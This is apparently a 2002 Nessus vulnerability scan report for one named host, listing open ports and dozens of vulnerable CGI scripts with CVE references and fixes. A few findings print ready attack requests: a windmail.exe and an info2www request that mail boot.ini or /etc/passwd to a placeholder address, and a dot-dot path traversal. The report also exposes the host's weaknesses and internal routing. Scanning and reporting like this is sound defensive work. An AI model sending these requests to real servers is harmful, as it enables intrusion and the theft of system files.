Network Vulnerability Assessment Report
21.01.2002
Sorted by host names

Session name: ns1.certholdings.comStart Time:21.01.2002 14:15:42
Finish Time:21.01.2002 14:58:00
Elapsed:0 day(s) 00:42:18
Total records generated:85
high severity:49
low severity:28
informational:8


Summary of scanned hosts

HostHolesWarningsOpen portsState
204.188.191.18849288Finished


204.188.191.188

ServiceSeverityDescription
ssh (22/tcp)
Info
Port is open
smtp (25/tcp)
Info
Port is open
domain (53/tcp)
Info
Port is open
pop3 (110/tcp)
Info
Port is open
sunrpc (111/tcp)
Info
Port is open
unknown (10000/tcp)
Info
Port is open
unknown (32768/tcp)
Info
Port is open
ftp (21/tcp)
Info
Port is open
unknown (10000/tcp)
High

The file /ncl_items.html exists on the remote system.
It is very likely that this file will allow an attacker
to reconfigure your Tektronix printer.

An attacker can use this to prevent the users of your
network from working properly by preventing them
from printing their files.

Solution : Filter incoming traffic to port 80 to this
device, or disable the Phaserlink webserver on the
printer (can be done by requesting http://printername/ncl_items?SUBJECT=2097)

Risk factor : Low
CVE : CAN-1999-1508
ssh (22/tcp)
High

You are running a version of OpenSSH which is older than 3.0.2.

Versions prior than 3.0.2 are vulnerable to an enviroment
variables export that can allow a local user to execute
command with root privileges.
This problem affect only versions prior than 3.0.2, and when
the UseLogin feature is enabled (usually disabled by default)

Solution : Upgrade to OpenSSH 3.0.2 or apply the patch for prior
versions. (Available at: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH)

Risk factor : High (If UseLogin is enabled, and locally)
unknown (10000/tcp)
High

The web server is probably susceptible to a common IIS vulnerability discovered by
'Rain Forest Puppy'. This vulnerability enables an attacker to execute arbitrary
commands on the server with Administrator Privileges.

See Microsoft security bulletin (MS99-025) for patch information.
Also, BUGTRAQ ID 529 on www.securityfocus.com (http://www.securityfocus.com/bid/529)

Risk factor : High
CVE : CVE-1999-1011
unknown (10000/tcp)
High
The 'get32.exe' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
unknown (10000/tcp)
High
The 'alibaba.pl' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands on the remote server.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-0885
unknown (10000/tcp)
High
The file /wwwboard/passwd.txt exists.

This file is installed by default with Matt's Script wwwboard
software. This can be a high risk vulnerability if the
password used is the same for other services. An attacker
can easily take over the board by cracking the passwd.

Solution : Configure the wwwadmin.pl script to put
the passwd.txt file somewhere else.

Risk factor : High
CVE : CVE-1999-0953
unknown (10000/tcp)
High
The 'wrap' CGI is installed. This CGI allows
anyone to get a listing for any directory with mode +755.


** Note that all implementations of 'wrap' are not
vulnerable. See the relevant CVE entry.

Solution : remove it from /cgi-bin.

Risk factor : Low/Medium
CVE : CVE-1999-0149
unknown (10000/tcp)
High
The 'windmail.exe' cgi is installed.

Some versions of this CGI script have a security flaw that lets
an attacker execute arbitrary commands on the remote server.

To test this, make the following request :

GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20you@youraddress.com

(replace you@youraddress.com by your real email address).

If you receive the content of the file boot.ini,
then you are vulnerable.

Solution : remove it from /cgi-bin. See www.geocel.com
for a new version.

Risk factor : Serious
CVE : CAN-2000-0242
unknown (10000/tcp)
High

It may be possible for an attacker to reconfigure the
remote web server by requesting :

GET /scripts/wsisa.dll/WService=anything?WSMadmin


Solution : Edit the ubroker.properties file and change
AllowMsngrCmds = 1
to :
AllowMsngrCmds = 0


Risk factor : High
CVE : CAN-2000-0127
unknown (10000/tcp)
High
The 'websendmail' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : Remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0196
unknown (10000/tcp)
High
The 'webgais' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin

Risk factor : Serious
CVE : CVE-1999-0176
unknown (10000/tcp)
High
The 'jj' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : Remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0260
unknown (10000/tcp)
High
At least one of these file or directories is
world readable :

/webcart/orders/
/webcart/orders/import.txt
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart-lite/orders/import.txt
/webcart-lite/config/clients.txt

This misconfiguration may allow an attacker to gather
the credit card numbers of your clients.

Solution : Do not make directories world readable.

Risk factor : High
CVE : CAN-1999-0610
unknown (10000/tcp)
High
It is possible to fill the hard disk of a server
running OmniHTTPd by issuing the request :
http://omni.server/cgi-bin/visadmin.exe?user=guest
This allows an attacker to crash your web server.
This script checks for the presence of the faulty CGI, but
does not execute it.

Solution : remove visadmin.exe from /cgi-bin.

Risk factor : Medium/High
CVE : CAN-1999-0970
unknown (10000/tcp)
High
The 'uploader.exe' CGI is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
CGI on the server, and then execute them.

Solution : remove it from /cgi-win.

Risk factor : Serious
CVE : CVE-1999-0177
unknown (10000/tcp)
High
The 'upload.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
files on the remote web server.

Solution : remove it from /cgi-bin.

Risk factor : Serious
unknown (10000/tcp)
High

The use of /iisadmin is not limited to the loopback address.
Anyone can use it to reconfigure your web server.

Solution : Restrict access to /iisadmin through the IIS ISM
Risk factor : High
unknown (10000/tcp)
High
The Cobalt 'siteUserMod' CGI is installed.
Older versions of this CGI allow any user to change the
administrator password.

Make sure you are running the latest version.

Solution :

RaQ 1 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ1-Security-3.6.pkg

RaQ 2 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ2-Security-2.94.pkg

RaQ 3 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ3-Security-2.2.pkg


Risk factor : High
CVE : CAN-2000-0117
unknown (10000/tcp)
High

The remote web server has one of these shells installed
in /cgi-bin :
ash, bash, csh, ksh, sh, tcsh, zsh

Leaving executable shells in the cgi-bin directory of
a web server may allow an attacker to execute arbitrary
commands on the target machine with the privileges of the
http daemon (usually root or nobody).

Solution : Remove all the shells from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-0509
unknown (10000/tcp)
High

At least one of these CGI scripts is installed :

hello.bat
echo.bat

They allow any attacker to execute commands
with the privileges of the web server process.

Solution : Delete all the *.bat files from your cgi-bin/
directory
Risk factor : High
CVE : CAN-2000-0213
unknown (10000/tcp)
High
Several versions of the 'icat' CGI allow a remote
user to read arbitrary file on the target system. Make sure you
are running the latest version of icat.

Risk factor : Medium/High.

Solution : Upgrade to the latest version of icat
CVE : CAN-1999-1069
unknown (10000/tcp)
High


BizDB is a web databse integration product
using perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's
contents to an unchecked open() call and
can therefore be made to execute commands
at the privilege level of the webserver.

The variable is dbname, and if passed a
semicolon followed by shell commands they
will be executed. This cannot be exploited
from a browser, as the software checks for
a referrer field in the HTTP request. A
valid referrer field can however be created
and sent programmatically or via a network
utility like netcat.

see also : http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm

Risk factor : Serious
CVE : CAN-2000-0287
unknown (10000/tcp)
High

The Cart32 e-commerce shopping cart is installed.

This software contains several security flaws :

- it may contain a backdoor
- users may be able to change the admin password remotely


You should use something else.

See also : http://www.cerberus-infosec.co.uk/advcart32.html

Solution : use another shopping cart software
Risk factor : High
CVE : CAN-2000-0429
unknown (10000/tcp)
High

RedHat Linux 6.0 installs by default a squid cache manager cgi script with
no restricted access permissions. This script could be used to perform a
port scan from the cgi-host machine.

Solution :
If you are not using the box as a Squid www proxy/cache server then
uninstall the package by executing:
/etc/rc.d/init.d/squid stop
rpm -e squid

If you want to continue using the Squid proxy server software, make the
following actions to tighten security access to the manager interface:
mkdir /home/httpd/protected-cgi-bin
mv /home/httpd/cgi-bin/cachemgr.cgi /home/httpd/protected-cgi-bin/

And add the following directives to /etc/httpd/conf/access.conf and
srm.conf:

--- start access.conf segment ---
# Protected cgi-bin directory for programs that
# should not have public access
order deny,allow
deny from all
allow fro
unknown (10000/tcp)
High
The 'plusmail' CGI is installed. Some
versions of this CGI have a well known security flaw that
lets an attacker execute arbitrary
commands with the privileges of the http daemon
(usually root or nobody).

Solution : remove it from /cgi-bin. No patch yet

Risk factor : Serious
CVE : CAN-2000-0074
unknown (10000/tcp)
High
The 'Perl' CGI is installed and can be launched
as a CGI. This is equivalent to giving a free shell to an attacker, with the
http server privileges (usually root or nobody).

Solution : remove it from /cgi-bin

Risk factor : Serious
CVE : CAN-1999-0509
unknown (10000/tcp)
High
The 'campas' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0146
unknown (10000/tcp)
High

It is possible to read the include file of PCCS-Mysql,
dbconnect.inc on the remote server.

This include file contains information such as the
username and password used to connect to the database.

Solution:
Versions 1.2.5 and later are not vulnerable to this issue.
A workaround is to restrict access to the .inc file.

Risk factor : High
CVE : CVE-2000-0707
unknown (10000/tcp)
High

The remote host seems to be vulnerable to a security problem in
CGIEmail (cgicso).
The vulnerability is caused by inadequate processing of queries
by CGIEmail's cgicso that results in cross site scripting.

Solution:
Modify cgilib.c to contain a stripper function that will
remove any HTML or JavaScript tags.

Risk Factor: Low
unknown (10000/tcp)
High
'cgiwrap' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

** Note that all version of cgiwrap are not affected
by this problem ! Consult your vendor.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-1530
unknown (10000/tcp)
High
The 'nph-publish.cgi' is installed. This CGI has
a well known security flaw that lets an attacker to execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-1177
unknown (10000/tcp)
High

The CGI /scripts/tools/newdsn.exe is present.

This CGI allows any attacker to create files
anywhere on your system if your NTFS permissions
are not tight enough, and can be used to overwrite
DSNs of existing dabases.

Solution : Remove newdsn.exe
Risk factor : High
CVE : CVE-1999-0191
unknown (10000/tcp)
High

The file /admin-serv/config/admpw is readable.

This file contains the encrypted password for the Netscape
administration server. Although it is encrypted, an attacker
may attempt to crack it by brute force.

Solution : Remove read access permissions for this file and/or stop
the netscape admininistration server.

Risk factor : Medium
unknown (10000/tcp)
High
The Sambar webserver is running
and the 'mailit.pl' cgi is installed. This CGI takes
a POST request from any host and sends a mail to a supplied address.

See http://www.toppoint.de/~hscholz/sambar for more information.

Solution : remove it from /cgi-bin.

Risk factor : Serious
unknown (10000/tcp)
High
The 'handler' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0148
unknown (10000/tcp)
High
It is possible to read
any file on the remote system by prepending
several dots before the file name.

Example :

GET ........../config.sys

Solution : Disable this service and install
a real Web Server.

Risk factor : High
CVE : CVE-1999-0386
unknown (10000/tcp)
High
The 'guestbook.pl' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0237
unknown (10000/tcp)
High
The 'bboard' servlet is installed in
/servlet/sunexamples.BBoardServlet. This servlet has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it.

Risk factor : Serious
CVE : CVE-2000-0629
unknown (10000/tcp)
High
The 'guestbook.cgi' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0237
unknown (10000/tcp)
High

ServletExec has a servlet called 'UploadServlet' in its server
side classes. UploadServlet, when invokable, allows an
attacker to upload any file to any directory on the server. The
uploaded file may have code that can later be executed on the
server, leading to remote command execution.

Solution : Remove it
Risk Factor: Serious
CVE : CAN-2000-1024
unknown (10000/tcp)
High
The Excite for Webservers is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Version 1.1 and newer are patched.


Solution : if you are running a version older than 1.1, then
upgrade it.

Risk factor : Serious
CVE : CVE-1999-0279
unknown (10000/tcp)
High
The 'info2www' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Example:

http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'

Solution : Remove it from /cgi-bin or upgrade.

Risk factor : Serious
CVE : CVE-1999-0266
unknown (10000/tcp)
High

IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages,
namely /iissamples/exair/search/query.asp, may be used to make IIS hang,
thus preventing it from answering to legitimate clients.

Solution : Delete the 'ExAir' sample IIS site

Risk factor : Medium.
CVE : CVE-1999-0449
unknown (10000/tcp)
High

IIS comes with the sample site 'ExAir'.
Unfortunately, one of its pages,
namely /iissamples/exair/search/search.asp,
may be used to make IIS hang, thus preventing
it from answering to legitimate clients.

Solution : Delete the 'ExAir' sample IIS site

Risk factor : Medium
CVE : CVE-1999-0449
unknown (10000/tcp)
High

The script /cart/cart.cgi is present.

If this shopping cart system is the Dansie
Shopping Cart, and if it is older than version 3.0.8
then it is very likely that it contains a backdoor
which allows anyone to execute arbitary commands on this system.

Solution : use another cart system
Risk factor : High
CVE : CAN-2000-0252
unknown (10000/tcp)
High
The 'Count.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0021
unknown (10000/tcp)
High
The 'glimpse' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Note that we could not actually check for the presence
of this vulnerability, so you may be using a patched
version.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0147
unknown (10000/tcp)
High
IIS comes with the sample site 'ExAir'. Unfortunately,
one of its pages, namely /iissamples/exair/search/advsearch.asp, may
be used to make II hang, thus preventing it from answering to legitimate
clients.

Risk factor : Medium/High.
Solution : Delete the 'ExAir' sample IIS site
CVE : CVE-1999-0449
unknown (10000/tcp)
High

The remote web server appears to be running with
Frontpage extensions and lets the file 'authors.pwd'
to be downloaded by everyone.

This is a security concern since this file contains
sensitive data.

Solution : Contact Microsoft for a fix.

Risk factor : Medium
CVE : CVE-1999-0386
unknown (10000/tcp)
Low

Textor Webmaster's Listre.pl CGI is installed on this host.
A security problem in this CGI allows execution of arbitrary
commands with the privileges of the web server.

Solution: Contact the author for a patch.
Risk factor : High

Additional information:
http://www.securiteam.com/unixfocus/5KP0N005FK.html
unknown (10000/tcp)
Low

The remote web server appears to be running with
Frontpage extensions.

You should double check the configuration since
a lot of security problems have been found with
FrontPage when the configuration file is
not well set up.

Risk factor : High if your configuration file is
not well set up
CVE : CVE-1999-0386
unknown (10000/tcp)
Low
a web server is running on this port
unknown (10000/tcp)
Low
The 'finger' cgi is installed. It is usually
not a good idea to have such a service installed, since
it usually gives more troubles than anything else.

Double check that you really want to have this
service installed.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-0197
unknown (10000/tcp)
Low
The 'nph-test-cgi' CGI is installed. This CGI has
a well known security flaw that lets an attacker get a listing
of the /cgi-bin directory, thus discovering which CGIs are installed
on the remote host.

Solution : remove it from /cgi-bin.

Risk factor : Serious
unknown (10000/tcp)
Low
The 'webdriver' cgi is installed. This CGI usually
lets anyone access the Informix databases of the hosts that run it.

** Warning : Nessus only tested the presence of this CGI, it did not
** determine if you specific version is vulnerable to that problem

Solution : remove it from /cgi-bin.

Risk factor : Serious
general/icmp
Low

The remote host answers to an ICMP timestamp
request. This allows an attacker to know the
date which is set on your machine.

This may help him to defeat all your
time based authentifications protocols.

Solution : filter out the icmp timestamp
requests (13), and the outgoing icmp
timestamp replies (14).

Risk factor : Low
CVE : CAN-1999-0524
unknown (10000/tcp)
Low
The 'mailnews' cgi is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
ftp (21/tcp)
Low
Remote FTP server banner :
ns1 ftp server (version wu-2.6.1-16.7x.1) ready.
ssh (22/tcp)
Low
Remote SSH version : ssh-1.99-openssh_2.9p2
unknown (10000/tcp)
Low
The 'dumpenv' cgi is installed. This
CGI gives away too much information about the web server
configuration, which will help a cracker.

Solution : remove it from /cgi-bin.

Risk factor : Low
CVE : CAN-1999-1178
unknown (10000/tcp)
Low
The 'pagelog.cgi' cgi is installed. This CGI has
a well known security flaw that lets an attacker create arbitrary
files on the remote server, ending in .txt, and reading arbitrary
files ending in .txt or .log

*** Warning : this flaw was not tested by Nessus. Check the existence
of /tmp/nessus_pagelog_cgi.txt on this host to find out if you
are vulnerable or not.

Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-2000-0940
ftp (21/tcp)
Low
The FTP service allows anonymous logins. If you do not
want to share data with anyone you do not know, then you should deactivate
the anonymous account, since it can only cause troubles.
Under most Unix system, doing :
echo ftp >> /etc/ftpusers
will correct this.

Risk factor : Low
CVE : CAN-1999-0497
pop3 (110/tcp)
Low
The remote POP server banner is :
+OK POP3 ns1 v2000.70rh server ready
smtp (25/tcp)
Low
Remote SMTP server banner :
ns1.certholdings.com ESMTP Sendmail 8.11.6/8.11.6
Mon, 21 Jan 2002 14:25:21 -0500
214-2.0.0 This is sendmail version 8.11.6214-2.0.0 Topics:

214-2.0.0 HELO EHLO MAIL RCPT DATA

214-2.0.0 RSET NOOP QUIT HELP VRFY

214-2.0.0 EXPN VERB ETRN DSN AUTH

214-2.0.0 STARTTLS

214-2.0.0 For more info use "HELP ".

214-2.0.0 To report bugs in the implementation send email to

214-2.0.0 sendmail-bugs@sendmail.org.

214-2.0.0 For local information send email to Postmaster at your site.

214 2.0.0 End of HELP info

domain (53/tcp)
Low

The remote name server allows recursive queries to be performed
by the host running nessusd.

If this is your internal nameserver, then forget this warning.

If you are probing a remote nameserver, then it allows anyone
to use it to resolve third parties names (such as www.nessus.org).
This allows hackers to do cache poisoning attacks against this
nameserver.


Solution : Restrict recursive queries to the hosts that should
use this nameserver (such as those of the LAN connected to it).
If you are using bind 8, you can do this by using the instruction
'allow-recursion' in the 'options' section of your named.conf

If you are using another name server, consult its documentation.

Risk factor : Serious
unknown (10000/tcp)
Low

The remote host seems to be vulnerable to a security problem in
CGIEmail (cgicso). The vulnerability is caused by inadequate processing
of queries by CGIEmail's cgicso and results in a command execution
vulnerability.

Impact:
The server can be compromised by executing commands as the web server's
running user (usually 'nobody').

Solution:
Modify cgicso.h to contain a strict setting of your finger host.

Example:
Define the following in cgicso.h:
#define CGI_CSO_HARDCODE
#define CGI_CSO_FINGERHOST 'localhost'

Risk Factor: High

Additional information:
http://www.securiteam.com/exploits/5TP0W005FE.html
unknown (10000/tcp)
Low

The CGI script ppdscgi.exe, part of the PowerPlay
Web Edition package, is installed.

Due to design problems as well as some
potential web server misconfiguration
PowerPlay Web Edition may serve up data
cubes in a non-secure manner. Execution
of the PowerPlay CGI pulls cube data into
files in an unprotected temporary directory.
Those files are then fed back to frames in
the browser. In some cases it is trivial for an
unauthenticated user to tap into those data
files before they are purged.

Solution : Cognos doesn't consider this
problem as being an issue, so they
do not provide any solution.

Risk factor : Medium
unknown (10000/tcp)
Low
The 'printenv' CGI is installed.
printenv normally returns all environment variables.

This gives an attacker valuable information about the
configuration of your web server, allowing them to focus their
attacks.

Solution : Remove it from /cgi-bin.

Risk factor : Medium
unknown (10000/tcp)
Low
The 'processit' CGI is installed.
processit normally returns all environment variables.

This gives an attacker valuable information about the
configuration of your web server, allowing them to focus their
attacks.

Solution : Remove it from /cgi-bin.

Risk factor : Medium
domain (53/tcp)
Low
The remote bind version is : 9.1.0
unknown (10000/tcp)
Low
The remote web server type is :

MiniServ/0.01

We recommend that you configure your web server to return
bogus versions, so that it makes the cracker job more difficult
general/tcp
Low
QueSO has found out that the remote host OS is
* Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS


CVE : CAN-1999-0454
general/udp
Low
For your information, here is the traceroute to 204.188.191.188 :
205.162.10.1
160.81.97.85
144.232.12.225
144.232.8.193
206.24.178.61
206.24.178.11
206.24.185.202
10.1.241.254
10.1.240.7
192.168.16.4
?
unknown (10000/tcp)
Low
Some Web Servers use a file called /robot(s).txt to make search engines and
any other indexing tools visit their WebPages more frequently and
more efficiently.
By connecting to the server and requesting the /robot(s).txt file, an
attacker may gain additional information about the system they are
attacking.
Such information as, restricted directories, hidden directories, cgi script
directories and etc. Take special care not to tell the robots not to index
sensitive directories, since this tells attackers exactly which of your
directories are sensitive.

Risk factor : Medium
unknown (10000/tcp)
Low
robot.txt contains the following:



















Login to Webmin
unknown (10000/tcp)
Low

The file /_ncl_items.shtml exists on the remote web server.
If the remote host is a Tektronix printer, then this page
allows anyone to reconfigure it without any authentication
means whatsoever.

An attacker may use this flaw to conduct a denial of service
attack against your business by preventing legitimate users
from printing their work, or against your network, by changing
the IP address of the printer so that it conflicts with the IP
address of your file server.

Solution : Contact Tektronix for a patch and filter incoming
traffic to this port
Risk factor : Low
CVE : CAN-2001-0484
unknown (10000/tcp)
Low

The rpm_query CGI is installed.

This CGI allows anyone who can connect to this
web server to obtain the list of the installed
RPMs.

This allows attacker to determine the version
number of your installed services, hence making
their attacks more accurate.

Solution : remove this CGI from cgi-bin/
Risk factor : Low
CVE : CVE-2000-0192